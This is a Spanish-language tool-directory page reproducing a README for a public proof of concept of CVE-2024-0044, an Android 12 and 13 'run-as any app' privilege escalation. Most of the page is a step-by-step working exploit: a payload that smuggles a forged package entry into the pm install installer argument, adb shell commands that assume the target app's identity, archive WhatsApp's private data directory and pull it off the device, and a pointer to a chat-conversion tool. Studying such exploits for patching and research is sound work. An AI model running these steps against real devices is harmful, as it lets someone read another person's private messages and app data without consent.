Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
c-CVE-2024-0044 — CVE-2024-0044: una vulnerabilidad de alta gravedad del tipo 'ejecutar como cualquier aplicación' que afecta a las versiones 12 y 13 de Android | Kitploit
Herramientas/GitHubGitHub/007criptografia/c-cve-2024-0044
Seguridad AndroidEscalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPentesting de Apps MóvilesExfiltración de DatosPost-ExplotaciónPruebas de PenetraciónSeguridad Móvil

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub007criptografia/c-cve-2024-0044

c-CVE-2024-0044

CVE-2024-0044: una vulnerabilidad de alta gravedad del tipo 'ejecutar como cualquier aplicación' que afecta a las versiones 12 y 13 de Android

Ver Repositorio
41hace 2 añosAún no revisado

CVE 2024 0044

CVE-2024-0044, identificada en la función createSessionInternal del archivo PackageInstallerService.java, es una vulnerabilidad de alta gravedad que afecta a Android versiones 12 y 13. Esta vulnerabilidad permite a un atacante realizar un ataque «run-as any app», lo que provoca una escalada local de privilegios sin requerir interacción del usuario. El problema surge debido a una validación de entrada incorrecta dentro de la función createSessionInternal. Un atacante puede explotar esto manipulando el proceso de creación de sesiones, obteniendo potencialmente acceso no autorizado a datos sensibles y realizando acciones no autorizadas en el dispositivo afectado.

El exploit fue descubierto por Meta security

La prueba de concepto fue resumida y compartida por Tiny hack

Los detalles sobre el parche de seguridad se pueden encontrar en el boletín de seguridad de Android

Requisitos previos

  1. Habilita la depuración USB en tu teléfono móvil y conéctalo a tu máquina mediante un cable USB o depuración inalámbrica.
  2. Descarga cualquier APK en tu máquina; puedes usar F-DROID

Cómo usar la herramienta

root@kitploit:~
python3 cve_2024_0044.py -h
                                                                               
##########################################################################################
###############S%%#####################################################%%S################
###############%++*S##################################################?++?################
################%++*S###############################################S*++?#################
#################%+++%#############################################S*++%##################
##################S*++%###########################################%+++%###################
###################S*++?#########SSS%%?????***?????%%%SS#########%++*S####################
#####################?++*##S%%?**+++++++++++++++++++++++**??%S##?++*S#####################
######################?++**+++++++++++++++++++++++++++++++++++**++*#######################
###################S%?*++++++++++++++++++++++++++++++++++++++++++++?%S####################
#################%?+++++++++++++++++++++++++++++++++++++++++++++++++++*%S#################
##############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++?S###############
############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S#############
##########S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S###########
#########%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##########
#######S*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S########
######%++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*++++++++++++++%#######
#####%++++++++++++++*######%+++++++++++++++++++++++++++++++++%######?++++++++++++++?######
####?+++++++++++++++*######S+++++++++++++++++++++++++++++++++%######?+++++++++++++++?#####
###%+++++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*+++++++++++++++++?####
##S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%###
##*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S##
#%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##
#*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S#
S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%#      
        
usage: cve_2024_0044.py [-h] -P P -A A

CVE-2024-0044: run-as any app @Pl4int3xt

options:
  -h, --help  show this help message and exit
  -P P        package name (default: None)
  -A A        apk file path (default: None)

-P se usa para especificar el nombre del paquete objetivo al que quieres ejecutar como

-A para especificar la ruta del archivo APK a enviar al dispositivo

Explotación

Ejecuta la herramienta python3 cve_2024_0044.py -P com.whatsapp -A /home/pl4int3xt/Downloads/F-Droid.apk

Se generará un archivo payload.txt como este:

root@kitploit:~
PAYLOAD="@null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk

La herramienta automatiza algunas partes y otras son manuales. Puedes salir después de generar el payload y ejecutar todos los comandos manualmente, o continuar con las instrucciones.

A continuación, necesitarás conectarte a tu dispositivo mediante adb shell y pegar el payload, asegurándote de recibir un mensaje de Success después del último comando

root@kitploit:~
pl4int3xt ~>  adb shell
pixel:/ $ PAYLOAD="@null
> victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pixel:/ $ pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk
Success

Luego obtenemos los datos de WhatsApp usando los siguientes comandos

root@kitploit:~
pixel:/ $ mkdir /data/local/tmp/wa/                                                                            
pixel:/ $ touch /data/local/tmp/wa/wa.tar
pixel:/ $ chmod -R 0777 /data/local/tmp/wa/
pixel:/ $ run-as victim
pixel:/data/user/0 $ tar -cf /data/local/tmp/wa/wa.tar com.whatsapp

Crea un directorio temporal: mkdir /data/local/tmp/wa/

Crea un marcador de posición para un archivo tar: touch /data/local/tmp/wa/wa.tar

Establece permisos amplios: chmod -R 0777 /data/local/tmp/wa/ para asegurar que cualquier usuario pueda leer, escribir y ejecutar dentro de este directorio.

Cambia el contexto de usuario: run-as victim para obtener los mismos permisos que el usuario "victim".

Archiva los datos de la aplicación objetivo: tar -cf /data/local/tmp/wa/wa.tar com.whatsapp, creando un tarball del directorio de datos de WhatsApp.

Finalmente, extrae los datos

adb pull /data/local/tmp/wa/wa.tar

Puedes extraer los datos usando 7z o cualquier otra herramienta.

Puedes usar Whatsapp chat exporter para convertirlos a HTML.

Esto te permite obtener los datos de WhatsApp sin necesidad de acceso root en tu dispositivo.

Descargar herramienta